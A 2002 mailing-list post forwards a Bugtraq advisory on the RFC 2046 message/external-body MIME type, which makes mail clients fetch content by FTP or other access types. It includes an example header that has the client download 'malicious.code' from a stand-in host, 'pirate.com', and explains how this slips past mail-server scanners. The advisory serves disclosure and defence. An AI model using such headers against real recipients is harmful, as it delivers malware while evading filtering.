[Mimedefang] Fwd: Another possible RFC 2046 vulnerability.

Douglas J Hunley doug at hunley.homeip.net
Fri Sep 27 23:31:02 EDT 2002 

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

can we deal with this?

- ----------  Forwarded Message  ----------

Subject: Another possible RFC 2046 vulnerability.
Date: Fri, 27 Sep 2002 13:01:46 +0200
From: Jose Marcio Martins da Cruz <Jose-Marcio.Martins at ensmp.fr>
To: bugtraq <bugtraq at securityfocus.com>

Hi,

Some days ago, we're talking about RFC 2046 message fragmentation
vulnerability.

There is another related RFC 2046 vulnerability : message/external-body
message type.

RFC 2046 message/external-body MIME type allows to send messages not by
it's content, but by reference.

In this case, you can send a message with the following MIME tag :

   Content-Type: message/external-body; name="malicious.code";
                 site="pirate.com"; mode="image";
                 access-type=ANON-FTP; directory="pub"

Client MUA, receives this and will get "malicious.code" file by
anonymous ftp from pirate.com ftp server.

RFC 2046 defines five access-types :"FTP", "ANON-FTP", "TFTP",
"LOCAL-FILE", and "MAIL-SERVER".

There are some other optional parameters to this feature.  For example,
if the message includes parameter permission="write", existing file will
be overwriten.

RFC 2046 says something about security in paragraph 5.2.3.6 :
>    (1)   Accessing data via a "message/external-body" reference
>          effectively results in the message recipient performing
>          an operation that was specified by the message
>          originator.  It is therefore possible for the message
>          originator to trick a recipient into doing something
>          they would not have done otherwise.  ...

Combining different access-types (mainly anon-ftp, mail-server and
local-file) can create; IMHO, more complex attacks.

What's interesting is that in this case the message and the malicious
code passes through two different network paths : messages is sent by
mail and the malicious code will be get by receiver by anonymous ftp.

In the case of previous vulnerability (fragmented message), message and
malicious code uses the same network path.

Classical mail server virus scanners will never see the malicious code
pass through it, as they will never have available entire malicious
code.

The only way to detect it, IMHO, at mail server, is by lexical analysis
of MIME tags.

Netscape Communicator 4.79 is compatible with this RFC 2046 feature.

I can't say anything about others mail clients, as I'm sick at home and
I have no access to other MUAs.

Attached to this message you'll find a message sent using this feature
and allowing you to get  RFC 2046 by anonymous ftp. Maybe someone can
check it out with Outlook and other popular MUAs. It's in the /var/mail
format : you can append it to your mailbox and try it... 8-)

References : RFC 2046 - MIME - Media Types

Jose Marcio


- --
 -------------------------------------------------------------------
 Jose Marcio MARTINS DA CRUZ
 Ecole Nationale Superieure des Mines de Paris
 Centre de Calcul                             Tel . : 01.40.51.93.41
 60, bd Saint Michel                    http://www.ensmp.fr/~martins
 75272 - PARIS CEDEX 06                   mailto:martins at cc.ensmp.fr

- -------------------------------------------------------


- -- 
Douglas J Hunley (doug at hunley.homeip.net) - Linux User #174778
Admin: Linux StepByStep - http://www.linux-sxs.org
	and http://jobs.linux-sxs.org

panic("Lucy in the sky....");
	2.2.16 /usr/src/linux/arch/sparc64/kernel/starfire.c
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.0 (GNU/Linux)

iD8DBQE9lSIvSrrWWknCnMIRAqldAJ4nDS8lk7Z9cVMBWyTMLTpXoOpA/ACguF1c
4f2t/CAFOg4IRMR7dowYIWg=
=q/h2
-----END PGP SIGNATURE-----
-------------- next part --------------
>From martins at didi.ensmp.fr  Wed Sep 18 10:40:02 2002
Return-Path: <martins at ensmp.fr>
Received: from didi.ensmp.fr (didi [10.5.5.101])
	by ticrobe.ensmp.fr (8.12.4/8.12.2/JMMC) with ESMTP id g8I8dLCi003339
	for <tijojo at adrian.ensmp.fr>; Wed, 18 Sep 2002 10:40:02 +0200
Sender: martins at paris.ensmp.fr
Message-ID: <3D88395A.AE13841F at didi.ensmp.fr>
Date: Wed, 18 Sep 2002 10:29:14 +0200
From: Jose Martins <martins at didi.ensmp.fr>
Reply-To: tijojo at paris.ensmp.fr
X-Mailer: Mozilla 4.79 [en] (X11; U; Linux 2.4.18-3 i686)
X-Accept-Language: en
MIME-Version: 1.0
To: tijojo at adrian.ensmp.fr
Subject: tst attachment
Content-Type: multipart/mixed;
 boundary="------------FA43411C8E35AC7F655DA077"
X-Miltered: at ticrobe by Joe's j-chkmail ("http://j-chkmail.ensmp.fr")!
Status: RO

This is a multi-part message in MIME format.
--------------FA43411C8E35AC7F655DA077
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit


RFC 2046 message/external-body compatibility test


--------------FA43411C8E35AC7F655DA077
Content-Type: message/external-body; name="rfc2046.Z";
        site="ftp.inria.fr"; mode="image";
        access-type=ANON-FTP; directory="rfc/rfc20xx"


--------------FA43411C8E35AC7F655DA077--

More information about the MIMEDefang mailing list